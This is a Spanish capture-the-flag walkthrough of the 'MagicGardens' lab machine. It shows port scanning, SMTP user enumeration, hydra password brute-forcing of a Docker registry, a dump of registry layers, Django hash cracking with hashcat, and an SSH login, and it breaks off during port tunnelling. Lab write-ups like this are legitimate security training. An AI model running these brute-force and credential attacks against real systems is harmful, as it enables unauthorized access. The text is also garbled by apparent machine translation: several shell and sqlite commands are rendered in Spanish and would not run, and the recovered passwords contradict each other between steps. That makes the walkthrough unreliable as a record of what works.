MagicGardens (port:25)

Escaneo:

nmap -p- --min-rate 5000 -oN fast_scan.txt 10.10.11.9

┌──(docker㉿docker)-[~/HackBox]
└─$ cat fast_scan.txt 
# Nmap 7.94SVN scan initiated Sat Dec 28 18:28:40 2024 as: /usr/lib/nmap/nmap --privileged -p- --min-rate 5000 -oN fast_scan.txt 10.10.11.9
Warning: 10.10.11.9 giving up on port because retransmission cap hit (10).
Nmap scan report for magicgardens.htb (10.10.11.9)
Host is up (0.24s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
25/tcp   filtered smtp
80/tcp   open     http
1337/tcp open     waste
5000/tcp open     upnp

# Nmap done at Sat Dec 28 18:29:07 2024 -- 1 IP address (1 host up) scanned in 27.51 seconds

Visitamos el 80:

Directorio de fuerza bruta

Correré gobuster a buscar directorios.

┌──(docker㉿docker)-[~/HackBox]
└─$ gobuster dir -u http://magicgardens.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 -x txt,html,php -k 

Encuentra más de un directorio aquí, pero ninguno de ellos nos funciona.

SMTP-TCP 25

En el escaneo de puertos se puede ver que el puerto 25 admite VRFY. El comando VRFY se utiliza para verificar si el usuario está presente en el servidor SMTP. Un atacante puede utilizar el comando VRFY para enumerar usuarios y así obtener información útil sobre el sistema de destino. En los servidores SMTP modernos, el comando VRFY suele estar deshabilitado para evitar ataques de enumeración de usuarios.

GitHub - cytopia/smtp-user-enum: SMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.GitHub

./smtp-user-enum -U /usr/share/wordlists/SecLists/Usernames/Names/malenames-usa-top1000.txt magicgardens.htb 25

./smtp-user-enum -U /usr/share/wordlists/SecLists/Usernames/Names/malenames-usa-top1000.txt magicgardens.htb 25
Connecting to magicgardens.htb 25 ...
220 magicgardens.magicgardens.htb ESMTP Postfix (Debian/GNU)
250 magicgardens.magicgardens.htb
Start enumerating users with VRFY mode ...

220 magicgardens.magicgardens.htb ESMTP Postfix (Debian/GNU)
250 magicgardens.magicgardens.htb
[----] FRANCISCO   550 5.1.1 <FRANCISCO>: Recipient address rejected: User unknown in local recipient table
[----] MARCUS      550 5.1.1 <MARCUS>: Recipient address rejected: User unknown in local recipient table
[----] MICHEAL     550 5.1.1 <MICHEAL>: Recipient address rejected: User unknown in local recipient table
[----] THEODORE    550 5.1.1 <THEODORE>: Recipient address rejected: User unknown in local recipient table
[----] CLIFFORD    550 5.1.1 <CLIFFORD>: Recipient address rejected: User unknown in local recipient table
[----] MIGUEL      550 5.1.1 <MIGUEL>: Recipient address rejected: User unknown in local recipient table
[----] OSCAR       550 5.1.1 <OSCAR>: Recipient address rejected: User unknown in local recipient table
[----] JAY         550 5.1.1 <JAY>: Recipient address rejected: User unknown in local recipient table
[----] JIM         550 5.1.1 <JIM>: Recipient address rejected: User unknown in local recipient table
[----] TOM         550 5.1.1 <TOM>: Recipient address rejected: User unknown in local recipient table
[----] CALVIN      550 5.1.1 <CALVIN>: Recipient address rejected: User unknown in local recipient table
[----] ALEX        252 2.0.0 ALEX

Registro Docker - TCP 5000

raíz@kali# hydra -f -l alex -P /usr/share/wordlists/rockyou.txt 10.10.11.9 -s 5000 https-get /v2/

Hydra v9.5 (c) 2023 por van Hauser/THC y David Maciejak - No lo use en organizaciones militares o de servicios secretos, o para fines ilegales (esto no es vinculante, estos *** ignoran las leyes y la ética de todos modos).



Hydra (https://github.com/vanhauser-thc/thc-hydra) a partir del 23/05/2024 19:20:55

[DATOS] máximo 16 tareas por 1 servidor, en total 16 tareas, 14344399 intentos de inicio de sesión (l:1/p:14344399), ~896525 intentos por tarea

[DATOS] atacando http-gets://10.10.11.9:5000/v2/



[5000][http-get] host: 10.10.11.9 nombre de usuario: alex contraseña: diamonds

[ESTADO] Ataque finalizado para 10.10.11.9 (se encontró un par válido)

1 de 1 objetivo completado con éxito, 1 contraseña válida encontrada

Hydra (https://github.com/vanhauser-thc/thc-hydra) finalizó el 23/05/2024 a las 19:21:55

Vuelco archivos de todos Docker Registry:

Grabación de registros de Docker

raíz@kali# python3 drg.py https://10.10.11.9 -U alex -P diamantes --dump_all

[+] jardinesmágicos.htb

[+] BlobSum encontró 30

[+] Descartando magicgardens.htb

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c

    [+] Descargando : 748da8c1b87e668267b90ea305e2671b22d046dcfeb189152bf590d594c3b3fc

    [+] Descargando : 81771b31efb313fb18dae7d8ca3a93c8c4554aa09239e09d61bbbc7ed58d4515

    [+] Descargando : 35b21a215463f8130302987a1954d01a8346cdd82c861d57eeb3cfb94d6511a8

    [+] Descargando : 437853d7b910e50d0a0a43b077da00948a21289a32e6ce082eb4d44593768eb1

    [+] Descargando : f9afd820562f8d93873f4dfed53f9065b928c552cf920e52e804177eff8b2c82

    [+] Descargando : d66316738a2760996cb59c8eb2b28c8fa10a73ce1d98fb75fda66071a1c659d6

    [+] Descargando : fedbb0514db0150f2376b0f778e5f304c302b53619b96a08824c50da7e3e97ea

    [+] Descargando : 480311b89e2d843d87e76ea44ffbb212643ba89c1e147f0d0ff800b5fe8964fb

    [+] Descargando : 02cea9e48b60ccaf6476be25bac7b982d97ef0ed66baeb8b0cffad643ece37d5

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : 8999ec22cbc0ab31d0e3471d591538ff6b2b4c3bbace9c2a97e6c68844382a78

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : 470924304c244ba833543bb487c73e232fd34623cdbfa51d30eab30ce802a10d

    [+] Descargando : 4bc8eb4a36a30acad7a56cf0b58b279b14fce7dd6623717f32896ea748774a59

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : 9c94b131279a02de1f5c2eb72e9cda9830b128840470843e0761a45d7bebbefe

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : c485c4ba383179db59368a8a4d2df3e783620647fe0b014331c7fd2bd8526e5b

    [+] Descargando : 9b1fd34c30b75e7edb20c2fd09a9862697f302ef9ae357e521ef3c84d5534e3f

    [+] Descargando : d31b0195ec5f04dfc78eca9d73b5d223fc36a29f54ee888bc4e0615b5839e692

    [+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4

    [+] Descargando : de4cac68b6165c40cf6f8b30417948c31be03a968e233e55ee40221553a5e570
    

Extraeré todos los archivos que tengo a través de Docker:

root@kali# para el archivo en *.tar.gz; hacer tar -xzf "$file"; hecho

Shell como Morty

Crack Morty Hash

Después de buscar las carpetas, /usr/src/appla ruta me resulta muy útil aquí.

Aquí encuentro la contraseña del usuario mortyen formato hash.

raíz@kali# sqlite3 db.sqlite3

Versión 3.45.1 de SQLite 2024-01-30 16:01:20

Introduzca ".help" para obtener sugerencias de uso.

sqlite> .tablas

grupo de autenticación tipo de contenido de django       

permisos de grupo de autenticación migraciones de django         

permiso de autenticación sesión de django            

usuario_autenticación orden_tienda               

grupos de usuarios de autenticación tienda de productos             

auth_user_user_permissions tienda_tiendamensaje        

django_admin_log usuario_tienda_tienda           

sqlite> seleccione * de auth_user;

2|pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=|2023-06-06 17:34:56.520750|1|morty|||1|1|2023-06-06 17:32:24|

sqlite>

Estoy buscando encontrar el formato hash correcto con Hashcat:

Para saber con que tipo de hash estamos trabajando y cual parametro es el indicado:

┌──(docker㉿docker)-[~/HackBox/smtp-user-enum]
└─$ hashcat -h | grep -i pbkdf2 
  11900 | PBKDF2-HMAC-MD5                                            | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                           | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                         | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                         | Generic KDF
   2500 | WPA-EAPOL-PBKDF2                                           | Network Protocol
  22000 | WPA-PBKDF2-PMKID+EAPOL                                     | Network Protocol
  16800 | WPA-PMKID-PBKDF2                                           | Network Protocol
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                            | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                              | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                               | Operating System
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)                    | FTP, HTTP, SMTP, LDAP Server
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)                | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)              | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)              | Full-Disk Encryption (FDE)
  21600 | Web2py pbkdf2-sha512                                       | Framework
  10000 | Django (PBKDF2-SHA256)                                     | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                               | Framework
  20200 | Python passlib pbkdf2-sha512                               | Framework
  20300 | Python passlib pbkdf2-sha256                               | Framework
  20400 | Python passlib pbkdf2-sha1                                 | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)          | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES)        | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                                     | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)              | Instant Messaging Service
  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)           | Instant Messaging Service
  29600 | Terra Station Wallet (AES256-CBC(PBKDF2($pass)))           | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256               | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                        | Cryptocurrency Wallet

Para nuestro hash es un 10000 | Django (PBKDF2-SHA256)

hashcat -m 10000 hash.key /usr/share/wordlists/rockyou.txt     

//pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:hermanosjonas

Entramos por ssh:

ssh morty@magicgardens.htb

jonasbrothers

Se puede usar Linpeas pero lo hare manualmente.

Abriremos un tunel dinamico para cada puerto abierto y ver que hay..

mort@magicgardens:~/bot$ netstat -tlnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:55587         0.0.0.0:*               LISTEN      1877/geckodriver    
tcp        0      0 127.0.0.1:49869         0.0.0.0:*               LISTEN      1883/firefox-esr    
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:38417         0.0.0.0:*               LISTEN      1883/firefox-esr    
tcp        0      0 127.0.0.1:42577         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::25                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::5000                 :::*                    LISTEN      -  

Se encontró en el tunel http://127.0.0.1:49869/ algo interesante..